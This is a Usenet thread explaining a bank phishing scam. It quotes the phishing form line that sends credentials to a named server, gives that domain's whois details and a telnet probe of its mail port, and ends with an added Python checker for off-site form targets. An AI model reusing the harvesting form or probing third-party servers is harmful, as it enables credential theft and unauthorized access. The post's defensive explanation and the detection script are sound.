Posted to uk.d-i-y
The Natural Philosopher[_2_]

Idle fun for net hackers..

Tim Streater wrote:
> In article , NT wrote:
>
>> On Feb 23, 3:01 pm, 82045 wrote:
>>> On Feb 23, 2:13 pm, Jim K wrote:
>>>
>>>> was poor Richard directly responsible or had his domain been
>>>> hacked by miscreants?
>>>
>>> If "poor Richard" has been hacked receipt of 1000 mails a second might
>>> make him more careful with his system security in future.
>>
>> More likely poor Richard doesn't have a clue what's going on, and will
>> simply have to abandon the email addy altogether.
>
> The OP said that Richard was running a mail server.

He was running a web server to gather phished data.

> In which case if he
> set that up, he should know better. If he didn't, and he's just a bot,
> then 1000 mails a second should fill his disk up PDQ and the machine
> will fall over.


Look, it seems that people don't actually understand this scam.

A letter arrives. It appears to come from - let's say -


One giveaway is it isn't addressed directly to you, by name.

It tells you to click on the attached html form and fill it out.

This form takes 99% of your own bank's website, but with one crucial
difference: instead of submitting the form to your bank, it submits it
to the phishing web server. I didn't try doing that to see what would
happen.

e.g. in it is this line

<form name="form1" action="http://www.drabcdfirstaid.com.au/.images/a.php" method="post">

At that point whatever you keyed in is now available to the phisher.

Anyway, I identified that server, and discovered it would accept emails.

#whois drabcdfirstaid.com.au
Domain Name: drabcdfirstaid.com.au
Last Modified: 30-Aug-2011 10:55:39 UTC
Registrar ID: NetRegistry
Registrar Name: NetRegistry
Status: ok

Registrant: LLOYD, RICHARD MILES
Eligibility Type: Sole Trader
Eligibility ID: ABN 35521483210
......

so

#telnet www.drabcdfirstaid.com.au 25
Trying 64.251.30.196...
Connected to drabcdfirstaid.com.au.
Escape character is '^]'.
220 spxxxx.int.infolink.com ESMTP Postfix (Ubuntu)

tells me it's a Ubuntu machine running Postfix mail. Now I know that if I
carry on with this telnet into the SMTP port, it's very likely that
root@localhost will be accepted as a direct recipient into the root
user's mailbox.

So I sent one. And it was.

The email came via an Oregon ISP. From a completely different source
entirely.

Now it's possible looking at the above that poor old Richard doesn't know
he has a nasty file stuffed in a hidden directory (.image) on his web
server.

OTOH I did not do anything nasty. He knows he's been violated at one
level or another so if he doesn't get down and check his server out, and
see lots of unusual access, he's a first grade dope anyway.
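The tell-tale in the attachment described above is a form whose action points at a server other than the bank's. The following is an added example, not code from the post or from anyone in the thread: it parses an HTML attachment, collects every form action, and reports those that would submit to a host outside the expected domain. The sample attachment and the domains in it are constructed for illustration.

```python
"""Flag HTML forms whose submit target is not on the expected (bank's) domain.

Added example for the thread above; not the poster's code. The sample
attachment below is constructed, and the domain names in it are placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionCollector(HTMLParser):
    """Collect the action attribute of every <form> tag in an HTML document."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            attr = dict(attrs)
            # A form with no action submits to the page's own URL; record it as "".
            self.actions.append(attr.get("action") or "")


def _host_matches(host, expected_domain):
    """True if host is expected_domain itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    expected_domain = expected_domain.lower().rstrip(".")
    return host == expected_domain or host.endswith("." + expected_domain)


def find_offsite_form_targets(html, expected_domain):
    """Return the form actions in html that do not clearly target expected_domain.

    Absolute actions on another host are reported. Relative or empty actions
    are reported as well: a detached attachment has no origin on the bank's
    domain, so there is nothing legitimate for them to resolve against.
    """
    parser = FormActionCollector()
    parser.feed(html)
    parser.close()
    offsite = []
    for action in parser.actions:
        parsed = urlparse(action)
        if not parsed.netloc:
            offsite.append(action)  # relative/empty action in a detached file
        elif not _host_matches(parsed.hostname or "", expected_domain):
            offsite.append(action)  # absolute action on a foreign host
    return offsite


# Constructed sample: a copy of a bank login page whose login form posts to a
# third-party host (placeholder name), plus one form that really is on-site.
SAMPLE_ATTACHMENT = """
<html><body>
<h1>Example Bank secure login</h1>
<form name="form1" action="http://www.phish-host.example/.images/a.php" method="post">
  <input name="user"><input name="pass" type="password"><input type="submit">
</form>
<form action="https://online.examplebank.example/feedback" method="post">
  <input name="comment">
</form>
</body></html>
"""


def check_sample():
    """Run the check against the constructed sample for examplebank.example."""
    return find_offsite_form_targets(SAMPLE_ATTACHMENT, "examplebank.example")


if __name__ == "__main__":
    for target in check_sample():
        print("form submits off-site:", target)
```

Run it against the saved attachment rather than opening the file in a browser; anything it lists is where the keyed-in data would actually go. The expected-domain check uses suffix matching on the host, so `online.examplebank.example` passes while a look-alike such as `examplebank.example.phish-host.example` does not.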